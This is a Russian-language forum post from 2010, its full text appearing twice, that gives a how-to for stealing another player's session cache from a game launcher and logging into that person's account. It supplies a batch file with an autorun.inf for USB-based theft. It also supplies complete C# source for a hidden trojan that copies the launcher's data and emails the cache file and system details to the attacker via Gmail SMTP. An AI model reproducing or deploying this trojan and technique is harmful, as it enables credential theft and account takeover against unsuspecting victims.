warl0ck
05.09.2010, 11:05
Доброго времени суток)
суть уязвимости заключаться в том что бы получить кэш зопускатра и с помощью его зайти на акк "Друга".
...
кэш храниться:
C:\Users\имя пользователя\AppData\Local\4GameZapuskatr
в файле:
data.tmp
....
открываем файл блокнотом и ищем такие строки
path=/\0\0\0\xfeinn-user=набор букав
"набор букав" - является кэшем.
...
чтобы зайти на акк
[Ссылки могут видеть только зарегистрированные и активированные пользователи]"набор букав"
...
теперь перейдем к самому сложному)
тырить кэш мы будим с помощью троя:elefant:
для этого можно найти какой нить "генератор" для создания, или написать самому...
тырим кэш через флешку
самый простой и геморройный способ
для начала нам нужно создать бат файл
@echo off
md J:\111\
CD /D %userprofile%\AppData\Local\4GameZapuskatr >nul
copy data.tmp J:\111\ >nul
и файл для авто запуска "autorun.inf"
[autorun]
open=ololo.exe
UseAutoPlay=1
все, теперь кидаем это все на флеху и несем "другу"
ps геморрой потому что мы не знаем на какой "диск" будет флеха. те C,D,D,E,F,J И ТП...
тырим кэш троем(отсылка на мыло)
для этого нам нужна "visual studio"
качаем устанавливаем и тп...
1 запускаем студию
2 создаем проект(консольный)
3 пишем название проекста, путь и тп...
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
пишем такой код:
using System;
using System.Collections.Generic;
using System.Text;
using System.Net.Mail;
using System.Net.Mime;
using System.Web;
using System.IO;
namespace Ololo
{
class Program
{
static void Main(string[] args)
{
DirectoryInfo FromFoGameZap = new DirectoryInfo(@"C:\users\" + Environment.UserName + @"\AppData\Local\4GameZapuskatr\");
DirectoryInfo ToFoGameZap = new DirectoryInfo("C:\\Temp\\FoGameZap");
Copydesk(FromFoGameZap, ToFoGameZap);
sendMail();
}
///функция копирования файлов\папок
static public void Copydesk(DirectoryInfo soursDir, DirectoryInfo destDir)
{
if (!destDir.Exists) destDir.Create();
if (!soursDir.Exists) soursDir.Create();
while (true)
{
DirectoryInfo[] dirs = soursDir.GetDirectories();
if (dirs.Length > 0)
{
foreach (DirectoryInfo di in dirs)
{
DirectoryInfo dir = new DirectoryInfo(destDir.FullName.ToString() + "\\" + di.Name.ToString());
Copydesk(di, dir);
}
break;
}
else if (dirs.Length < 0) ;
{
break;
}
}
if (!soursDir.Exists) soursDir.Create();
if (!destDir.Exists) destDir.Create();
while (true)
{
FileInfo[] fls = soursDir.GetFiles();
if (fls.Length > 0)
{
foreach (FileInfo fi in fls)
{
fi.CopyTo(destDir.FullName.ToString() + "\\" + fi.Name.ToString(), true);
}
break;
}
else if (fls.Length < 0) ;
{
break;
}
}
}
///функция отправки почты
static public void sendMail()
{
SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
client.EnableSsl = true;
client.Credentials = new System.Net.NetworkCredential("мыло троя", "пароль");
MailMessage msg = new MailMessage();
msg.From = new MailAddress("мыло троя");
msg.To.Add(new MailAddress("ваше мыло"));
msg.Subject = "ololo"; ///заголовок письма
msg.Body = "ololo" + " UserName: " + Environment.UserName + " DomainName: " + Environment.UserDomainName + " OSver: " + Environment.OSVersion;
msg.SubjectEncoding = System.Text.Encoding.UTF8;
msg.BodyEncoding = System.Text.UTF8Encoding.UTF8;
string file = String.Format("C:\\Temp\\FoGameZap\\data.tmp");
Attachment attach = new Attachment(file);
ContentDisposition disposition = attach.ContentDisposition;
client.Timeout = 999999999;
msg.Attachments.Add(attach);
try
{
client.Send(msg);
}
catch { }
}
}
}
жмем f5.
все!!
заходим в папку с проектом и в папке "debug" находим наш ехешник.
для скрытия консоли(черного окошка троя)
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
выбираем виндовс апликашен
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
исходник ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
суть уязвимости заключаться в том что бы получить кэш зопускатра и с помощью его зайти на акк "Друга".
...
кэш храниться:
C:\Users\имя пользователя\AppData\Local\4GameZapuskatr
в файле:
data.tmp
....
открываем файл блокнотом и ищем такие строки
path=/\0\0\0\xfeinn-user=набор букав
"набор букав" - является кэшем.
...
чтобы зайти на акк
[Ссылки могут видеть только зарегистрированные и активированные пользователи]"набор букав"
...
теперь перейдем к самому сложному)
тырить кэш мы будим с помощью троя:elefant:
для этого можно найти какой нить "генератор" для создания, или написать самому...
тырим кэш через флешку
самый простой и геморройный способ
для начала нам нужно создать бат файл
@echo off
md J:\111\
CD /D %userprofile%\AppData\Local\4GameZapuskatr >nul
copy data.tmp J:\111\ >nul
и файл для авто запуска "autorun.inf"
[autorun]
open=ololo.exe
UseAutoPlay=1
все, теперь кидаем это все на флеху и несем "другу"
ps геморрой потому что мы не знаем на какой "диск" будет флеха. те C,D,D,E,F,J И ТП...
тырим кэш троем(отсылка на мыло)
для этого нам нужна "visual studio"
качаем устанавливаем и тп...
1 запускаем студию
2 создаем проект(консольный)
3 пишем название проекста, путь и тп...
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
пишем такой код:
using System;
using System.Collections.Generic;
using System.Text;
using System.Net.Mail;
using System.Net.Mime;
using System.Web;
using System.IO;
namespace Ololo
{
class Program
{
static void Main(string[] args)
{
DirectoryInfo FromFoGameZap = new DirectoryInfo(@"C:\users\" + Environment.UserName + @"\AppData\Local\4GameZapuskatr\");
DirectoryInfo ToFoGameZap = new DirectoryInfo("C:\\Temp\\FoGameZap");
Copydesk(FromFoGameZap, ToFoGameZap);
sendMail();
}
///функция копирования файлов\папок
static public void Copydesk(DirectoryInfo soursDir, DirectoryInfo destDir)
{
if (!destDir.Exists) destDir.Create();
if (!soursDir.Exists) soursDir.Create();
while (true)
{
DirectoryInfo[] dirs = soursDir.GetDirectories();
if (dirs.Length > 0)
{
foreach (DirectoryInfo di in dirs)
{
DirectoryInfo dir = new DirectoryInfo(destDir.FullName.ToString() + "\\" + di.Name.ToString());
Copydesk(di, dir);
}
break;
}
else if (dirs.Length < 0) ;
{
break;
}
}
if (!soursDir.Exists) soursDir.Create();
if (!destDir.Exists) destDir.Create();
while (true)
{
FileInfo[] fls = soursDir.GetFiles();
if (fls.Length > 0)
{
foreach (FileInfo fi in fls)
{
fi.CopyTo(destDir.FullName.ToString() + "\\" + fi.Name.ToString(), true);
}
break;
}
else if (fls.Length < 0) ;
{
break;
}
}
}
///функция отправки почты
static public void sendMail()
{
SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
client.EnableSsl = true;
client.Credentials = new System.Net.NetworkCredential("мыло троя", "пароль");
MailMessage msg = new MailMessage();
msg.From = new MailAddress("мыло троя");
msg.To.Add(new MailAddress("ваше мыло"));
msg.Subject = "ololo"; ///заголовок письма
msg.Body = "ololo" + " UserName: " + Environment.UserName + " DomainName: " + Environment.UserDomainName + " OSver: " + Environment.OSVersion;
msg.SubjectEncoding = System.Text.Encoding.UTF8;
msg.BodyEncoding = System.Text.UTF8Encoding.UTF8;
string file = String.Format("C:\\Temp\\FoGameZap\\data.tmp");
Attachment attach = new Attachment(file);
ContentDisposition disposition = attach.ContentDisposition;
client.Timeout = 999999999;
msg.Attachments.Add(attach);
try
{
client.Send(msg);
}
catch { }
}
}
}
жмем f5.
все!!
заходим в папку с проектом и в папке "debug" находим наш ехешник.
для скрытия консоли(черного окошка троя)
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
выбираем виндовс апликашен
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
исходник ([Ссылки могут видеть только зарегистрированные и активированные пользователи])